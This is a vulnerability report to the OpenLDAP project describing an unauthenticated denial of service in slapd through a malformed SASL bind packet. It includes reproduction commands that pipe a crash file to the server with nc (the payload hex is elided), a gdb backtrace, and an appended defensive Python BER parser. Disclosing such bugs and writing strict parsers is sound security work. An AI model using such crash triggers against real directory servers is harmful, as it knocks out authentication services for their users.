Full_Name: Stephan Zeisberg
Version: 2.4.48
OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
URL:
Submission from: (NULL) (78.54.65.139)
Dear OpenLDAP team,
# Issue description
Unauthenticated remote denial-of-service through malformed LDAP packet
# Version
openldap-2.4.48.tgz
# How to reproduce
## Compile
$ tar xzvf openldap-2.4.48.tgz
$ cd openldap-2.4.48
$ ./configure --prefix=/tmp/openldap
$ make depend
$ make
$ make install
$ cd /tmp/openldap
## Start server
$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091
## Create PoC crash file
$ echo -n "..." | xxd -r -p > ldap.crash
## Execute PoC (may need to be executed multiple times)
$ nc 127.0.0.1 9091 < ldap.crash
# GDB
...
slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) &&
old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top)
&& ((unsigned long) old_end & (pagesize - 1)) == 0)' failed.
Thread 3 "slapd" received signal SIGABRT, Aborted.
[Switching to Thread 0x7fffb4aba700 (LWP 3684510)]
0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
Missing separate debuginfos, use: dnf debuginfo-install
cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64
cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64
krb5-libs-1.17-45.fc31.x86_64 libcom_err-1.45.3-1.fc31.x86_64
libdb-5.3.28-38.fc31.x86_64 libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64
libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64
libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64
openssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64
(gdb) bt
#0 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
#1 0x00007ffff5b238d9 in abort () from /lib64/libc.so.6
#2 0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6
#3 0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6
#4 0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6
#5 0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6
#6 0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6
#7 0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6
#8 0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6
#9 0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110,
priority=<optimized out>,
message=0x7fffa8103d30 "Couldn't find mech
a\202\003\336\060\202\003ڠ\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301FҔ\t\327\030\070\030{\023Z\247y"...)
at sasl.c:146
#10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3
#11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3
#12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0) at sasl.c:1524
#13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at bind.c:280
#14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at bind.c:205
#15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8, arg_v=0x7fffa8003120) at connection.c:1158
#16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8, argv=<optimized out>) at connection.c:1294
#17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at tpool.c:696
#18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0
#19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6
Please let me know what additional information I can provide to successfully
reproduce the issue.
Note: I have also tested and reproduced the issue using the precompiled package
from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP:
slapd 2.4.47 (Jul 25 2019 00:00:00))
-Stephan Zeisberg
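Added example (not part of the report above, and not OpenLDAP or Cyrus SASL code): the packet involved is a SASL BindRequest (RFC 4511 section 4.2), and frame #9 of the backtrace shows the mechanism name being logged as a C string that runs on into binary data. The script below encodes that packet shape and parses it back with explicit bounds checks, cutting the mechanism field at its own BER length and validating it against the RFC 4422 mechanism-name grammar before anything downstream sees it. Every sample message is constructed here; the binary-mechanism sample only imitates the shape of the logged string (its leading bytes 0x61 0x82 ... are consistent with a DER Kerberos Ticket) and is not the reporter's ldap.crash payload. Nothing in it asserts the root cause or the fix for this issue.

```python
# Strict decoder for an LDAP SASL BindRequest (RFC 4511 section 4.2).
# Example code written for this page; samples are constructed, not the PoC.
import re

TAG_SEQUENCE = 0x30      # LDAPMessage and nested SEQUENCEs
TAG_INTEGER = 0x02       # messageID, version
TAG_OCTET_STRING = 0x04  # name, mechanism, credentials
TAG_BIND_REQUEST = 0x60  # [APPLICATION 0] constructed
TAG_SASL_CREDS = 0xA3    # authentication CHOICE: sasl [3] SaslCredentials

# RFC 4422 section 3.1: 1 to 20 uppercase letters, digits, '-' or '_'
MECH_NAME = re.compile(rb"[A-Z0-9_-]{1,20}")


class MalformedLDAP(ValueError):
    """The message violates the BER/LDAP encoding rules."""


def ber_length(n: int) -> bytes:
    """Definite-form BER length; LDAP forbids the indefinite form (RFC 4511 5.1)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + ber_length(len(value)) + value


def build_sasl_bind(msg_id: int, mechanism: bytes, credentials: bytes,
                    name: bytes = b"", version: int = 3) -> bytes:
    """Encode LDAPMessage { messageID, BindRequest { version, name, sasl [3] } }."""
    sasl = tlv(TAG_SASL_CREDS,
               tlv(TAG_OCTET_STRING, mechanism) + tlv(TAG_OCTET_STRING, credentials))
    bind = tlv(TAG_BIND_REQUEST,
               tlv(TAG_INTEGER, bytes([version])) + tlv(TAG_OCTET_STRING, name) + sasl)
    return tlv(TAG_SEQUENCE, tlv(TAG_INTEGER, bytes([msg_id])) + bind)


def read_tlv(buf: bytes, pos: int, expect: int):
    """Read one TLV at buf[pos] -> (value, next_pos); never reads past len(buf)."""
    if pos + 2 > len(buf):
        raise MalformedLDAP("truncated tag/length")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if tag != expect:
        raise MalformedLDAP(f"expected tag 0x{expect:02x}, got 0x{tag:02x}")
    if length == 0x80:
        raise MalformedLDAP("indefinite length is not permitted in LDAP")
    if length > 0x80:                      # long form: 0x8N, then N length bytes
        n = length & 0x7F
        if n > 4 or pos + n > len(buf):
            raise MalformedLDAP("bad long-form length")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise MalformedLDAP("declared length exceeds available bytes")
    return buf[pos:pos + length], pos + length


def parse_sasl_bind(buf: bytes) -> dict:
    """Decode a SASL BindRequest, rejecting anything that is not well-formed."""
    msg, end = read_tlv(buf, 0, TAG_SEQUENCE)
    if end != len(buf):
        raise MalformedLDAP("trailing bytes after LDAPMessage")
    msg_id, p = read_tlv(msg, 0, TAG_INTEGER)
    bind, p = read_tlv(msg, p, TAG_BIND_REQUEST)
    if p != len(msg):
        raise MalformedLDAP("trailing bytes after protocolOp")
    version, q = read_tlv(bind, 0, TAG_INTEGER)
    name, q = read_tlv(bind, q, TAG_OCTET_STRING)
    sasl, q = read_tlv(bind, q, TAG_SASL_CREDS)
    if q != len(bind):
        raise MalformedLDAP("trailing bytes after authentication")
    mech, r = read_tlv(sasl, 0, TAG_OCTET_STRING)
    creds = b""
    if r < len(sasl):                      # credentials OCTET STRING is OPTIONAL
        creds, r = read_tlv(sasl, r, TAG_OCTET_STRING)
    if r != len(sasl):
        raise MalformedLDAP("trailing bytes after SaslCredentials")
    if not msg_id or not version:
        raise MalformedLDAP("empty INTEGER")
    # `mech` is already cut at its own BER length, so credential bytes cannot
    # run into it here; the grammar check additionally rejects NUL bytes and
    # binary data that a C-string consumer would otherwise carry along.
    if not MECH_NAME.fullmatch(mech):
        raise MalformedLDAP("mechanism is not a valid SASL mechanism name")
    return {"message_id": int.from_bytes(msg_id, "big", signed=True),
            "version": int.from_bytes(version, "big", signed=True),
            "name": name, "mechanism": mech.decode("ascii"), "credentials": creds}


def check(buf: bytes) -> str:
    """'ok' for a well-formed SASL bind, otherwise the parser's complaint."""
    try:
        parse_sasl_bind(buf)
        return "ok"
    except MalformedLDAP as exc:
        return f"malformed: {exc}"


# Constructed samples (not the reporter's payload).
GOOD = build_sasl_bind(1, b"GSSAPI", b"\x60\x06\x06\x04\x01\x02\x03\x04")
# Mechanism field holding bytes shaped like the trace's "Couldn't find mech a\202\003...":
# the start of a DER Kerberos Ticket ([APPLICATION 1] = 0x61 = 'a') where a name belongs.
BINARY_MECH = build_sasl_bind(1, b"a\x82\x03\xde\x30\x82\x03\xda", b"")
TRUNCATED = GOOD[:-3]                     # declared lengths now exceed the buffer
NUL_MECH = build_sasl_bind(1, b"GSSAPI\x00PLAIN", b"")

if __name__ == "__main__":
    for label, pkt in (("good", GOOD), ("binary mech", BINARY_MECH),
                       ("truncated", TRUNCATED), ("embedded NUL", NUL_MECH)):
        print(f"{label:12s} -> {check(pkt)}")
```

Run without arguments to classify the four samples; to vet a suspicious bind before replaying it against a test server, pass the raw bytes read from the socket or extracted from a capture to `check()`. The design point is that every field is bounded by the length its own TLV declares and the mechanism is validated as a name, so no later consumer has to trust that the bytes end where a C string would.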